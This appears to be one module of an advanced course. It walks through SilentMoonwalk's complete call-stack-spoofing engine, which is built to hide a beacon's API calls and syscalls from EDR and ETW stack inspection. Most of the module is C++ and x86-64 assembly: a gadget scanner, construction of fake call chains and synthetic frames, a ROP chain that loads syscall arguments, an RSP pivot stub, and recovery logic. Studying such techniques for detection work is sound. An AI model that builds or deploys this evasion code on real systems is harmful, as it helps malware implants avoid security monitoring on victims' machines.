Difficulty: Advanced

Module 7: The Full Spoof Engine

Assembling every piece into a complete, walkable, executable spoofed call stack.

The Complete Picture

This module brings together everything from the previous six modules into SilentMoonwalk's end-to-end algorithm. We'll trace the complete lifecycle: from selecting a target call chain, through gadget matching and frame construction, to the actual ROP-driven syscall invocation with a fully spoofed stack. This is the algorithm that makes SilentMoonwalk a generation ahead of prior approaches.

High-Level Algorithm Overview

SilentMoonwalk's spoofing engine executes in several phases. Each phase builds on the results of the previous one:

SilentMoonwalk Execution Phases

Phase 1
Initialization

→

Phase 2
Chain Selection

→

Phase 3
Frame Fabrication

→

Phase 4
ROP Assembly

→

Phase 5
Execution

Phase 1: Initialization

At startup, SilentMoonwalk scans loaded modules to build its gadget database and function catalog:

C++// Phase 1: One-time initialization
class SpoofEngine {
    GadgetDB gadgets;
    std::vector<FunctionInfo> functionCatalog;
    HMODULE hNtdll;
    HMODULE hKernel32;
    HMODULE hKernelBase;

    void Initialize() {
        // 1. Get handles to system modules
        hNtdll     = GetModuleHandleA("ntdll.dll");
        hKernel32  = GetModuleHandleA("kernel32.dll");
        hKernelBase = GetModuleHandleA("kernelbase.dll");

        // 2. Build gadget database from all system modules
        gadgets.Build(hNtdll);
        gadgets.Build(hKernel32);
        gadgets.Build(hKernelBase);

        // 3. Catalog all functions with their frame sizes
        CatalogFunctions(hNtdll);
        CatalogFunctions(hKernel32);
        CatalogFunctions(hKernelBase);

        // 4. Identify critical termination frames
        //    Every thread stack ends with these two frames
        resolveTerminalFrames();
    }

    void resolveTerminalFrames() {
        // All Windows threads have this at the bottom of their stack:
        //   kernel32!BaseThreadInitThunk+0x14
        //   ntdll!RtlUserThreadStart+0x21
        // We need the RUNTIME_FUNCTION for each to compute
        // their exact frame sizes for the synthetic chain.

        DWORD64 imgBase;
        pBaseThreadInitThunk = RtlLookupFunctionEntry(
            (DWORD64)GetProcAddress(hKernel32, "BaseThreadInitThunk"),
            &imgBase, NULL
        );
        pRtlUserThreadStart = RtlLookupFunctionEntry(
            (DWORD64)GetProcAddress(hNtdll, "RtlUserThreadStart"),
            &imgBase, NULL
        );
    }
};

Phase 2: Call Chain Selection

When a spoofed call is requested, SilentMoonwalk selects a realistic call chain. The chain must be plausible for the type of API being called. For example, a thread sleeping via NtWaitForSingleObject should show a chain involving the Sleep family of functions:

C++// Phase 2: Select a plausible call chain for the target syscall
struct CallChainSpec {
    PVOID               targetApi;      // The actual API to call
    std::vector<PVOID>  spoofedChain;   // Functions to appear on stack
};

CallChainSpec SelectCallChain(PVOID targetApi) {
    CallChainSpec spec;
    spec.targetApi = targetApi;

    // Build a realistic chain ending at the standard thread entry
    // For NtWaitForSingleObject, a typical chain might be:
    //
    //   NtWaitForSingleObject           (the syscall itself)
    //   KERNELBASE!WaitForSingleObjectEx (wrapper that calls Nt*)
    //   kernel32!SleepEx                 (high-level sleep function)
    //   kernel32!Sleep                   (simplest sleep wrapper)
    //   <application function>           (we skip this - too specific)
    //   kernel32!BaseThreadInitThunk     (standard thread entry)
    //   ntdll!RtlUserThreadStart         (thread bootstrap)

    spec.spoofedChain = {
        GetProcAddress(hKernelBase, "WaitForSingleObjectEx"),
        GetProcAddress(hKernel32,   "SleepEx"),
        GetProcAddress(hKernel32,   "Sleep"),
        GetProcAddress(hKernel32,   "BaseThreadInitThunk"),
        GetProcAddress(hNtdll,      "RtlUserThreadStart")
    };

    return spec;
}

Chain Plausibility

The spoofed chain should represent a realistic call path. An EDR might cross-reference the chain to verify that function A actually calls function B in its code. SilentMoonwalk selects functions from known call paths in the Windows API. For sleeping beacons, the Sleep → SleepEx → WaitForSingleObjectEx → NtWaitForSingleObject chain is one of the most common patterns in legitimate software.

Phase 3: Frame Fabrication

With the call chain selected, SilentMoonwalk computes the frame size for each function and allocates the synthetic stack space:

C++// Phase 3: Compute frame sizes and build synthetic frame map
struct SyntheticFrame {
    PRUNTIME_FUNCTION pFunc;
    PUNWIND_INFO      pUnwind;
    DWORD             frameSize;      // Allocation + pushes
    DWORD             totalSize;      // Including return address slot
    PVOID             returnAddr;     // Points into next function in chain
    DWORD             stackOffset;    // Offset from synthetic stack base
    std::vector<RegisterSave> savedRegs;  // Non-volatile reg saves
};

std::vector<SyntheticFrame> FabricateFrames(CallChainSpec& spec) {
    std::vector<SyntheticFrame> frames;
    DWORD totalStackNeeded = 0;

    for (size_t i = 0; i < spec.spoofedChain.size(); i++) {
        SyntheticFrame sf;
        DWORD64 imageBase;

        // Look up the RUNTIME_FUNCTION for this chain entry
        sf.pFunc = RtlLookupFunctionEntry(
            (DWORD64)spec.spoofedChain[i], &imageBase, NULL
        );
        sf.pUnwind = (PUNWIND_INFO)(imageBase + sf.pFunc->UnwindData);
        sf.frameSize = ComputeFrameSize(sf.pUnwind);
        sf.totalSize = sf.frameSize + 8; // +8 for return address

        // Determine return address: point into the NEXT function
        if (i + 1 < spec.spoofedChain.size()) {
            sf.returnAddr = FindReturnAddress(
                /* next func's RUNTIME_FUNCTION */
                LookupFunc(spec.spoofedChain[i + 1]),
                imageBase
            );
        } else {
            sf.returnAddr = NULL; // Terminal frame
        }

        // Parse saved register locations from unwind codes
        sf.savedRegs = ParseRegisterSaves(sf.pUnwind);

        sf.stackOffset = totalStackNeeded;
        totalStackNeeded += sf.totalSize;
        frames.push_back(sf);
    }

    return frames;
}

Phase 4: ROP Chain Assembly

This is the most complex phase. The synthetic frame data must simultaneously serve as a valid ROP chain for execution AND a valid unwind chain for inspection. SilentMoonwalk weaves gadget addresses into the frame data at positions that are both reachable during ROP execution and benign during unwinding:

C++// Phase 4: Assemble the dual-purpose stack layout
void AssembleRopChain(
    PBYTE syntheticStack,
    std::vector<SyntheticFrame>& frames,
    PVOID targetApi,
    PVOID targetApiArgs[4],     // RCX, RDX, R8, R9
    PVOID rbxTrampoline         // Pointer to memory holding targetApi addr
) {
    DWORD offset = 0;

    // === STAGE A: Parameter setup (before the spoofed frames) ===
    // Place POP gadgets to load API arguments into registers
    // These execute first in the ROP chain

    // pop rcx; ret -- loads first argument
    *(PVOID*)(syntheticStack + offset) = gadgets.popRcx;
    offset += 8;
    *(PVOID*)(syntheticStack + offset) = targetApiArgs[0]; // RCX value
    offset += 8;

    // pop rdx; ret -- loads second argument
    *(PVOID*)(syntheticStack + offset) = gadgets.popRdx;
    offset += 8;
    *(PVOID*)(syntheticStack + offset) = targetApiArgs[1]; // RDX value
    offset += 8;

    // pop r8; ret -- loads third argument
    *(PVOID*)(syntheticStack + offset) = gadgets.popR8;
    offset += 8;
    *(PVOID*)(syntheticStack + offset) = targetApiArgs[2]; // R8 value
    offset += 8;

    // pop r9; ret -- loads fourth argument
    *(PVOID*)(syntheticStack + offset) = gadgets.popR9;
    offset += 8;
    *(PVOID*)(syntheticStack + offset) = targetApiArgs[3]; // R9 value
    offset += 8;

    // === STAGE B: JMP [RBX] trampoline ===
    // RBX was set up earlier to point to memory containing targetApi addr
    // The JMP transfers control WITHOUT pushing a return address
    *(PVOID*)(syntheticStack + offset) = gadgets.jmpRbx;
    offset += 8;

    // === STAGE C: Fake return address ===
    // When targetApi executes RET, it pops this address.
    // This is where the spoofed stack begins from the unwinder's view.
    // It points into the first function in our spoofed chain.
    *(PVOID*)(syntheticStack + offset) = frames[0].returnAddr;
    offset += 8;

    // === STAGE D: Synthetic frames ===
    // Each frame occupies exactly the right number of bytes
    for (size_t i = 0; i < frames.size(); i++) {
        SyntheticFrame& sf = frames[i];

        // Fill frame body with plausible data
        // The local variable area can contain recovery gadgets
        FillFrameBody(syntheticStack + offset, sf);

        // Place saved register values at correct offsets
        for (auto& reg : sf.savedRegs) {
            *(DWORD64*)(syntheticStack + offset + reg.stackOffset) =
                GeneratePlausibleRegValue(hNtdll, hKernel32);
        }

        // Place return address at end of frame
        *(PVOID*)(syntheticStack + offset + sf.frameSize) = sf.returnAddr;

        offset += sf.totalSize;
    }
}

The Dual-Purpose Challenge

The stack bytes between the JMP [RBX] trampoline and the first return address serve double duty. During ROP execution, RSP advances through parameter setup gadgets and then the trampoline transfers to the target API. During stack unwinding (triggered by an EDR), the unwinder starts at the return address and walks backward through the synthetic frames. These two traversals operate on overlapping but different portions of the stack data, which is why careful offset calculation is essential.

Phase 5: Execution

With the synthetic stack fully assembled, SilentMoonwalk pivots RSP to the synthetic stack and begins the ROP chain. This is done via an assembly stub:

x86-64 ASM; SilentMoonwalk's execution stub (simplified)
; Called from C++ with the synthetic stack address in RCX

SpoofAndCall PROC
    ; Save all non-volatile registers (callee-saved)
    push rbp
    push rbx
    push rdi
    push rsi
    push r12
    push r13
    push r14
    push r15

    ; Save the real RSP so we can restore it later
    mov r15, rsp           ; R15 = real stack pointer (saved)

    ; Set up RBX for the JMP [RBX] trampoline
    ; RCX = pointer to struct { PVOID pTargetApi; BYTE syntheticStack[...]; }
    lea rbx, [rcx]         ; RBX = pointer to target API address

    ; Pivot RSP to the synthetic stack
    ; The ROP chain starts at offset 8 in the synthetic buffer
    lea rsp, [rcx + 8]     ; RSP now points to our ROP chain

    ; Begin ROP execution:
    ; RSP -> [pop rcx gadget addr]
    ;        [RCX value]
    ;        [pop rdx gadget addr]
    ;        [RDX value]
    ;        ... (parameter setup)
    ;        [JMP [RBX] gadget addr]
    ;
    ; The first RET pops and jumps to pop rcx gadget.
    ; Each gadget's RET chains to the next.
    ; JMP [RBX] transfers to the target API.
    ; Target API's RET lands on our spoofed return address.

    ret                    ; Start the ROP chain!

    ; === Recovery point ===
    ; After the target API returns through the spoofed chain,
    ; a recovery gadget redirects execution here
RecoveryPoint:
    ; Restore real RSP
    mov rsp, r15

    ; Restore non-volatile registers
    pop r15
    pop r14
    pop r13
    pop r12
    pop rsi
    pop rdi
    pop rbx
    pop rbp

    ret                    ; Return to caller with spoofed call complete
SpoofAndCall ENDP

The Recovery Mechanism

After the target API returns through the spoofed stack frames, execution must return to the real code. SilentMoonwalk embeds a recovery gadget address within the synthetic frames that, when reached during ROP unwinding, redirects execution back to the recovery point:

C++// The recovery mechanism:
// 1. Target API (e.g., NtWaitForSingleObject) returns
// 2. It pops the first spoofed return address from the stack
// 3. Execution lands at the first frame's "body" area
// 4. The frame body contains an ADD RSP, N; RET gadget that
//    advances RSP through the frame to the next return address
// 5. This chain continues through each synthetic frame
// 6. The last frame's return address points to the RecoveryPoint
//    in the assembly stub
// 7. Execution returns to the real caller with the original RSP

// Alternatively, a simpler recovery approach:
// The first spoofed return address can directly point to a
// gadget that restores RSP from a saved register (e.g., R15):
//   mov rsp, r15
//   ret
// This immediately collapses the synthetic stack and returns
// to the real code. However, this gadget is harder to find
// with valid unwind metadata.

Complete Execution Timeline

1. Save real RSP, pivot to synthetic stack

2. ROP: POP RCX/RDX/R8/R9 (load arguments)

3. ROP: JMP [RBX] → target API begins executing

4. Target API runs (stack looks clean to any inspector)

5. Target API RET → pops spoofed return address

6. ROP: Recovery gadgets chain through synthetic frames

7. Restore real RSP, return to original caller

Handling the Syscall Boundary

For direct syscalls (where the beacon invokes the syscall instruction directly rather than calling through ntdll), SilentMoonwalk must ensure the stack is clean at the exact moment the syscall instruction executes. The kernel captures the user-mode stack trace at syscall entry:

C++// For direct syscall invocation with spoofed stack:
// The synthetic stack must be in place BEFORE the syscall instruction.
//
// Approach:
// 1. Build synthetic stack as above
// 2. Place the syscall stub (mov r10, rcx; mov eax, SSN; syscall)
//    at the bottom of the ROP chain, OR
// 3. Use the JMP [RBX] gadget to jump to ntdll's syscall stub
//    (the actual 'syscall' instruction inside ntdll)
//
// Option 3 is preferred because:
// - The return address on the stack (pushed by nothing - we used JMP)
//   is our spoofed address pointing into a legitimate function
// - The kernel sees RSP pointing to our synthetic stack
// - ETW stack capture walks our synthetic frames correctly
// - The syscall instruction itself is inside ntdll (legitimate location)

The Elegance of JMP-Based Syscalls

By using JMP [RBX] to reach ntdll's syscall stub instead of CALL, SilentMoonwalk avoids pushing any return address. The stack at the moment of syscall execution contains only the synthetic frames. The kernel's ETW stack walker processes these frames using RtlVirtualUnwind and sees a completely normal call chain. This is why JMP [RBX] is the linchpin of the entire technique.

Complete Data Flow

Here is the complete data dependency between all components:

Component	Inputs	Outputs	Consumed By
Module Scanner	ntdll, kernel32 .pdata	Function catalog + UNWIND_INFO	Gadget search, frame fabrication
Gadget Scanner	.text sections, RUNTIME_FUNCTIONs	Gadget database (indexed by type/size)	ROP chain assembly
Chain Selector	Target API identity	Ordered list of spoofed functions	Frame fabrication
Frame Fabricator	Chain spec + UNWIND_INFOs	Frame sizes, register save maps, return addrs	ROP assembly
ROP Assembler	Gadgets + frames + API args	Synthetic stack buffer	Execution stub
Execution Stub	Synthetic stack + RSP pivot	API call with spoofed stack	Target API

← Previous: Synthetic Frames Next: Detection & Countermeasures →